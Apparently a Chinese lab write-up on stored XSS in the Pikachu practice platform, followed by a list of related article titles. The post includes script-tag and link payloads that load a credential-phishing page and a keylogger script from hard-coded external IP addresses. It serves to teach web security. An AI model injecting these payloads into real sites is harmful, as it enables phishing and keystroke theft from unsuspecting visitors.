原理:使用者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发xss代码。 输入内容后直接在下方回显,回显的地方就是我们插入的内容的地方。

根据显示代码进行闭合弹框尝试,payload:

黑客一般都会使用存储型xss进行钓鱼。 在pikachu平台自带有钓鱼功能,鱼饵:http://81.68.155.178:82/pkxss/xfish/fish.php

将上面的鱼饵写入到我们的存储型xss中,然后引诱鱼儿上钩:

payload:<script src="http://81.68.155.178:82/pkxss/xfish/fish.php"></script>

或者写的再诱惑点:

<a href="http://81.68.155.178:82/pkxss/xfish/fish.php">登录看大美丽照片</a>

这里有个巨坑,由于这里用的phpstudy搭建的环境,会发现一直提交授权,一直输入密码都不会将数据写入数据库。这个坑后来找到了原因:PHP 的 HTTP 认证机制仅在 PHP 以 Apache 模块方式运行时才有效,因此该功能不适用于 CGI 版本,我这里使用的是phpStudy搭建的环境,默认是以CGI版本运行PHP。后续通过重新搭建环境解决此问题。一直没有写入到数据库中键盘记录:

payload:<script src="http://150.158.23.229:8000/pkxss/rkeypress/rk.js"></script>

将pik中rk.js文件中ip修改为云服务器的ip。

把上述payload写入输入框中,当前页面的键盘就会被记录

存储型XSS原理讲解及实战实验相关推荐

  1. 存储型XSS CMS实战

    Dedecms存储型xss 影响版本 DedeCMS-V5.7-UTF8-SP2,网站需要开启商城功能. 漏洞分析 address.des.email.postname参数过滤不严导致xss漏洞.po ...

  2. 富文本存储型XSS的模糊测试之道

    富文本存储型XSS的模糊测试之道 凭借黑吧安全网漏洞报告平台的公开案例数据,我们足以管中窥豹,跨站脚本漏洞(Cross-site Script)仍是不少企业在业务安全风险排查和修复过程中需要对抗的&q ...

  3. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  4. 代码审计之Catfish CMS v4.5.7后台作者权限越权两枚+存储型XSS一枚

    首先本地搭建环境,我所使用的是Windows PHPstudy集成环境.使用起来非常方便.特别是审计的时候.可以任意切换PHP版本. 本文作者:226safe Team – Poacher 0×01 ...

  5. XSS—存储型xss

    xss =>跨站脚本攻击=>前端代码注入=>用户输入的数据会被当做前端代码执行. 原理:使用者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的 ...

  6. steam 相同元素相加_7500美元的存储型XSS漏洞(steam客户端)

    近期,Hackerone网站披露了一个基于Steam聊天客户端的存储型XSS漏洞,得到了官方7500美元的奖励,而漏洞发现者还表示这个漏洞还可能在未来造成远程命令执行等问题. Steam的聊天客户端可 ...

  7. 存储型XSS结合XSS平台获取cookie信息进后台——efucms

    百度搜索:efucms-含有存储型XSS漏洞的源码包 下载即可 实验目的:利用存储型XSS获取管理员Cookie信息,修改本地Cookie信息为管理员Cookie,以管理员身份不输入用户名.密码直接登 ...

  8. 【网络攻防】“跨站脚本攻击” 第二弹 ——存储型XSS

    撰稿|谢泳 编辑|王聪丽.虞珍妮 信息收集|谢泳 目录 1. 前言 2. 什么是存储型XSS 3. 攻击原理 4. 防御方式 1. 前言 上一篇介绍了跨域脚本攻击中的"反射型XSS" ...

  9. 二次注入 php,dedecms20140606 二次注入+存储型xss

    红色目录有exp,注入比较鸡肋 目录 dede/soft_edit.php, 存储型XSS漏洞        2 include /memberlogin.class.php 会员笔名二次注入    ...

最新文章

  1. 详解微信域名防封的方法以及检测等工具的技术原理
  2. Nginx的配置文件
  3. 测试和恢复性的争论:面向对象vs.函数式编程
  4. SpringBoot 2.x 整合Mybatis三:tk.mybatis
  5. springcloud 03_SpringCloud概述
  6. mysql 嵌入式 性能_database – 在mySQL中优化嵌入式SELECT查询
  7. linux 内核字符驱动char_dev源码分析
  8. 阿里云ACE认证之理解CDN技术
  9. 丰巢快递将强制收费引网友吐槽,全国第一驿站表示继续免费
  10. php 中PHP_EOL使用
  11. js 一个关于图片onload加载的事
  12. Python数学建模系列(一):规划问题之线性规划
  13. sql查询表名、列名、列属性
  14. 微信小程序中 三元运算符的嵌套使用
  15. Learn C++学习笔记:第M章—最常用的智能指针:std::unique_ptr std::make_unique
  16. 数据整理—dplyr包(mutate系列)
  17. php登陆网页版微信代码,几行php代码实现微信自动注册登陆 (微信PC扫码受权登陆注册)...
  18. 外包 | py2 下的 pickle 转成 py3 下的 pickle
  19. 计算机蛋白组学与基因组学,基因组学和生物信息学的联系和区别?
  20. android 之TCP客户端编程

热门文章

  1. 企业管理之如何理解企业战略
  2. ActionScript中的关键词
  3. 鬼火(irrlicht)的复燃
  4. 【每日早报】2020/02/15
  5. win10怎样删除右键菜单多余命令
  6. 渐渐失去了曾经所拥有的,曾经的人,都渐渐离开了
  7. node框架LoopBack教程
  8. 《灌篮高手》电影版终于定档了!网友:爷青回!!!
  9. Python爬虫,手把手教你爬取QQ空间信息
  10. Python-OpenCV中的图像处理 » 轮廓:入门